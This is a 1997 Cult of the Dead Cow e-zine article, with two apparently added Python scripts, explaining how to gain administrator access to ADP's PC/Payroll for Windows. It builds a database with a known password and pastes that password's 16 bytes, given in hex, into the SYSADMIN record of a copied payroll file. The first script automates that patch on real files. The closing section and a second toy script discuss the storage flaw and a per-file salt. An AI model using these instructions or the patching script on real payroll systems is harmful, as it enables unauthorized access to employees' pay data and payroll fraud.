_
|
| \
| \
| | \
__ | |\ \ __
_____________ _/_/ | | \ \ _/_/ _____________
| ___________ _/_/ | | \ \ _/_/ ___________ |
| | _/_/_____ | | > > _/_/_____ | |
| | /________/ | | / / /________/ | |
| | | | / / | |
| | | |/ / | |
| | | | / | |
| | | / | |
| | |_/ | |
| | | |
| | c o m m u n i c a t i o n s | |
| |________________________________________________________________| |
|____________________________________________________________________|

...presents... Hacking PC/Payroll for Windows

by Tarkin Darklighter

09/01/1997-#340


__///////\ -cDc- CULT OF THE DEAD COW -cDc- /\\\\\\\__
\\\\\\\/ Everything You Need Since 1986 \///////
___ _ _ ___ _ _ ___ _ _ ___ _ _ ___
|___heal_the_sick___raise_the_dead___cleanse_the_lepers___cast_out_demons___|

I. Introduction

Automatic Data Processing (ADP) is the nation's largest provider of
computerized payroll transaction processing. PC/Payroll for Windows is
ADP's client/server front end for AutoPay, which is in use by over
225,000 clients and 20 million employees (per ADP's 1996 annual report).
With PC/Payroll, you can either connect to a SQL server or use ADP's
run-time SQL server engine to access a local database. Whichever option
the company in question is using, the security is trivial to defeat.

When you execute PC/Payroll, you are asked for a user name and password.
The natural inclination in a case like this is to just "brute force"
your way into the program via a word list. That isn't necessary: there
are some major security flaws in the database structure itself, and the
password check can be bypassed by editing the database file directly.

So, let's get to it.

II. Tools

A. PC/Payroll and its configuration

The first thing you'll need is a copy of PC/Payroll for Windows. If you
can't obtain the installation CD, you'll need to copy the \PCPW
directory from the user's hard drive or from the server. Also, be sure
to copy the MFCOLEUI.DLL file from the \WINDOWS\SYSTEM directory or you
won't be able to execute the program.

The actual payroll database file is usually stored in a subdirectory of
\PCPW. The default directory name is PAY4WIN and the default database
name is PAY4WIN.DBS. This database can get very large, so make sure you
have a lot of storage space available. Work on a copy of the database:
the edits below are made with a disk editor, behind the SQL engine's
back, and the engine must not have the file open while you copy or edit
it (see section IV for the server case).

There are two INI files in the \PCPW directory that may be important:
SQL.INI and PAY4WIN.INI. Make sure that the entries in these files
point to the correct drive letter and directory on your system.

B. Disk editor

You'll also need a good disk editor to examine the database file. I
prefer Norton Disk Editor (DOS version 8.0), but remember that a lot of
these old editors won't work properly with the FAT32 file system that
came in with Windows 95 OSR2. You can really screw up your hard drive if
you're not careful.

III. Methodology

We're going to perform a basic "cut-and-paste" operation on the password
fields in the database. The stored password bytes do not depend on which
database file they live in, so if we create a user with a known password
in a database of our own, we can copy that user's password field into
the SYSADMIN password field of the real database and log in with the
password we know.

The next question is exactly HOW to create a new user without actually
getting into the program first. Fortunately for us, ADP provides a SQL
database utility that will do just exactly that! We're going to create
a new database and then create a new user/password within that database.

To create a new database:

1. Start up the WINTALK.EXE utility.
2. Select Admin/Install Database.
3. Check the "Local" box.
4. Check the "New" box.
5. The Password field is not important. Just put whatever you want in
   here.
6. Type in the name of a new database. (We'll use NEWDB in this
   example.)
7. Click OK.

The new database should now be created. If you're having problems,
check the entries in the SQL.INI file.

Now, to create the user and password:

1. Select Session/Connect from within WINTALK.EXE.
2. Select NEWDB from the box on the left and click OK.
3. Select Security/New User from the menu bar.
4. Create a new user named SYSADMIN with password "PASSWORD" (it's not
   case-sensitive) with DBA privileges and click OK.
5. Exit WINTALK.

The next step is to copy your new password into the original database
file. Let's take a look at the database:

Open the NEWDB.DBS file with your disk editor and search for the SECOND
instance of SYSADMIN. This is the Master User account that has full
access to everything in PC/Payroll.

The password field is located immediately after the user name. It's
made up of 16 bytes, beginning right after a 10h byte (10h is 16
decimal, the length of the field that follows). In our example above,
the bytes should read:

45 45 4B 46 4D 4B 46 48 4D 49 48 47 42 42 48 4B

You should get the same string of bytes if you used a password of
"PASSWORD", no matter which database you created it in; that is the
flaw this whole hack rests on. Write these numbers down.

Now, use your disk editor to open your copy of PAY4WIN.DBS. Search for
the SECOND instance of SYSADMIN again and locate the password field. If
you can't find a SYSADMIN user, locate the second instance of another
user (like the name of your payroll clerk) with sufficient privileges in
PC/Payroll, and use that user's password field instead.

All you have to do is copy the 16 bytes you wrote down into that user's
password field, starting right after the 10h byte. Only those 16 bytes
change; don't insert or delete anything, or every offset after the edit
will shift. Save your changes.

Start PAY4WIN.EXE, and log in using SYSADMIN (or the user you patched)
and PASSWORD. You should have full access.

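The cut-and-paste step above, automated. This is an added example, not part of the original cDc text and not ADP code. It only knows the layout the article describes (user name, then a 10h byte, then 16 password bytes, with the SECOND instance of the name being the master record) and refuses to patch if the 10h byte is not where that layout says it should be; a real PAY4WIN.DBS may carry other bytes between the name and the length byte. The sample "database" bytes are constructed for the demo and are not real PAY4WIN.DBS contents. Run it on copies, never the live file.

```python
"""
Added example, not from the original cDc text and not ADP code: a script
that does the section III cut-and-paste on a COPY of the database file.

Assumed layout (taken from the article, which is all this code knows): the
user name is followed by a 10h byte, read here as the length (16) of the
password field that immediately follows.  A real PAY4WIN.DBS may carry
other bytes between the name and the length byte; in that case
locate_password_field() raises instead of patching the wrong place.
"""
import sys

FIELD_LEN = 0x10  # the "10h" the article says precedes the 16 password bytes


def find_nth(data: bytes, needle: bytes, n: int) -> int:
    """Offset of the n-th (1-based) occurrence of needle in data, or -1."""
    pos = -1
    for _ in range(n):
        pos = data.find(needle, pos + 1)
        if pos == -1:
            break
    return pos


def locate_password_field(data: bytes, user: bytes, occurrence: int = 2) -> int:
    """Offset of the 16-byte password field for the given user record.

    The article says the SECOND instance of the user name is the master
    user record, so occurrence defaults to 2.  The 10h byte is checked so a
    different on-disk layout fails loudly rather than corrupting the file.
    """
    name_off = find_nth(data, user, occurrence)
    if name_off == -1:
        raise ValueError(f"occurrence {occurrence} of {user!r} not found")
    len_off = name_off + len(user)
    if len_off >= len(data) or data[len_off] != FIELD_LEN:
        raise ValueError(f"no 10h length byte after {user!r} at offset {len_off:#x}")
    return len_off + 1


def read_password_field(data: bytes, user: bytes) -> bytes:
    off = locate_password_field(data, user)
    return data[off:off + FIELD_LEN]


def transplant(src: bytes, dst: bytes, user: bytes) -> bytes:
    """Copy of dst with user's password field replaced by the one in src.
    Same length in and out: only the 16 field bytes change, no insert/delete."""
    field = read_password_field(src, user)
    off = locate_password_field(dst, user)
    return dst[:off] + field + dst[off + FIELD_LEN:]


def hexdump(field: bytes) -> str:
    """Render the field the way the article lists it (space-separated hex)."""
    return " ".join(f"{b:02X}" for b in field)


# --- constructed sample data: NOT real PAY4WIN.DBS contents -----------------
# The 16 bytes the article gives for the password "PASSWORD".
KNOWN_FIELD = bytes.fromhex("45454B464D4B46484D4948474242484B")
# Placeholder for the victim's unknown field in PAY4WIN.DBS.
UNKNOWN_FIELD = bytes(range(0x61, 0x71))


def fake_dbs(user: bytes, field: bytes) -> bytes:
    """A tiny stand-in for a .DBS file: a header, a first (non-record) mention
    of the user name, then the master record with the 10h byte and field."""
    return b"\x00HDR\x00" + user + b"\x00\x00" + user + bytes([FIELD_LEN]) + field + b"\x00" * 4


NEWDB = fake_dbs(b"SYSADMIN", KNOWN_FIELD)      # the database you created
PAY4WIN = fake_dbs(b"SYSADMIN", UNKNOWN_FIELD)  # the victim database (a copy)


def main(argv: list[str]) -> int:
    if len(argv) == 4:
        # usage: transplant.py NEWDB.DBS PAY4WIN-copy.DBS SYSADMIN
        src = open(argv[1], "rb").read()
        dst = open(argv[2], "rb").read()
        user = argv[3].encode()
        patched = transplant(src, dst, user)
        open(argv[2] + ".patched", "wb").write(patched)
        print("wrote", argv[2] + ".patched", "field =", hexdump(read_password_field(patched, user)))
    else:
        print("NEWDB field  :", hexdump(read_password_field(NEWDB, b"SYSADMIN")))
        patched = transplant(NEWDB, PAY4WIN, b"SYSADMIN")
        print("PAY4WIN after:", hexdump(read_password_field(patched, b"SYSADMIN")))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Without arguments the script runs against the constructed sample bytes and prints the 16-byte field before and after; with three arguments it writes a `.patched` copy next to the target file and never touches the original. The length check on the 10h byte is the only safety net: if the real file puts the length byte elsewhere, the script stops rather than overwriting whatever happens to follow the name.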
IV. Additional Notes

This hack has also been proven to work on Novell NetWare servers running
the SQL engine as an NLM. Just copy the database and log files from the
server to your local machine and proceed as above. Note that you will
have to unload the SQL NLM in order to grab the files, since the engine
holds them open. (You can copy them at will if the server is running a
utility like St. Bernard's Open File Manager.)

V. Conclusion

I must admit, this is pretty weak security, especially for something as
important as payroll. Most companies guard their payroll information
VERY closely. The root of the problem is that the stored password bytes
are the same for a given password in every database file, and nothing in
the file detects that a field was changed from outside the program.
There are a lot of ways ADP could have made this more difficult. Simply
encrypting the passwords using a unique number in each database file
would have been enough to make things much more difficult! Even that
only raises the bar, though: if the unique number is stored in the same
file, anyone with a disk editor can copy it across along with the
password field, so the file would also need an integrity check keyed by
something that is not sitting on the disk next to it.

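To make the conclusion concrete, here is an added toy credential store (this example's own scheme, not ADP's and not from the cDc text) that contrasts three situations: a password field encoded identically in every file, the "unique number per database file" fix proposed above, and that fix when the attacker can edit the number too. The SHA-256 construction, the 16-byte field width and the class layout are this example's assumptions; the random per-file number stands in for whatever ADP might have used.

```python
"""
Added example, not from the cDc text and not ADP's scheme: a toy credential
store that makes the point of section V concrete.  It contrasts a password
field encoded the same way in every database (what the article exploits)
with one bound to a per-database random number, then shows the limit of
that fix when the attacker can edit the random number too.  SHA-256, the
16-byte field and the class layout are this example's own assumptions.
"""
import hashlib
import hmac
import os

FIELD_LEN = 16  # width of the stored field, matching the article's 16 bytes


def encode_password(db_number: bytes, password: str) -> bytes:
    """Stored form of a password.  Case is folded because the article says
    PC/Payroll passwords are not case-sensitive (which by itself shrinks the
    search space).  With db_number == b"" this models the situation the
    article found: identical bytes for a given password in every file."""
    return hashlib.sha256(db_number + password.upper().encode()).digest()[:FIELD_LEN]


class ToyDatabase:
    def __init__(self, unique_number: bool):
        # The "unique number in each database file" section V proposes.
        self.number = os.urandom(16) if unique_number else b""
        self.users: dict[str, bytes] = {}

    def add_user(self, user: str, password: str) -> None:
        self.users[user] = encode_password(self.number, password)

    def check(self, user: str, password: str) -> bool:
        stored = self.users.get(user, b"")
        return hmac.compare_digest(stored, encode_password(self.number, password))


def copy_field(src: ToyDatabase, dst: ToyDatabase, user: str) -> None:
    """The section III disk-editor move: overwrite only the 16 field bytes."""
    dst.users[user] = src.users[user]


def copy_field_and_number(src: ToyDatabase, dst: ToyDatabase, user: str) -> None:
    """Same attacker, once the per-file number is also stored in the file."""
    dst.number = src.number
    dst.users[user] = src.users[user]


def scenario(unique_number: bool, copy_number: bool) -> bool:
    """Build NEWDB and a victim file, transplant, and report whether the
    attacker's known password "PASSWORD" now opens the victim's SYSADMIN."""
    newdb = ToyDatabase(unique_number)
    newdb.add_user("SYSADMIN", "PASSWORD")
    victim = ToyDatabase(unique_number)
    victim.add_user("SYSADMIN", "real-password-unknown-to-attacker")
    if copy_number:
        copy_field_and_number(newdb, victim, "SYSADMIN")
    else:
        copy_field(newdb, victim, "SYSADMIN")
    return victim.check("SYSADMIN", "PASSWORD")


def demo() -> tuple[bool, bool, bool]:
    return (
        scenario(unique_number=False, copy_number=False),  # article's case: True
        scenario(unique_number=True, copy_number=False),   # section V fix: False
        scenario(unique_number=True, copy_number=True),    # fix bypassed: True
    )


if __name__ == "__main__":
    unsalted, salted, salted_copied = demo()
    print("no per-file number, copy field       :", unsalted)
    print("per-file number, copy field only     :", salted)
    print("per-file number, copy field + number :", salted_copied)
```

The first result is the article's attack; the second is what the per-file number buys; the third is why it is not sufficient against someone who writes raw sectors. Binding the stored field to the file only helps if the binding value cannot itself be rewritten by the same hand, which means either an integrity check keyed outside the file or a verification secret that does not live on the disk beside the data.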
.-. _ _ .-.
/ \ .-. ((___)) .-. / \
/.ooM \ / \ .-. [ x x ] .-. / \ /.ooM \
-/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
/lucky 13\ / \ / `-(' ')-' \ / \ /lucky 13\
\ / `-' (U) `-' \ /
`-' the original e-zine `-' _
Oooo eastside westside / ) __
/)(\ ( \ WORLDWIDE / ( / \
\__/ ) / Copyright (c) 1997 cDc communications and the author. \ ) \)(/
(_/ CULT OF THE DEAD COW is a registered trademark of oooO
cDc communications, PO Box 53011, Lubbock, TX, 79453, USA. _
oooO All rights reserved. Edited by Grandmaster Ratte'. __ ( \
/ ) /)(\ / \ ) \
\ ( \__/ Save yourself! Go outside! Do something! \)(/ ( /
\_) xXx BOW to the COW xXx Oooo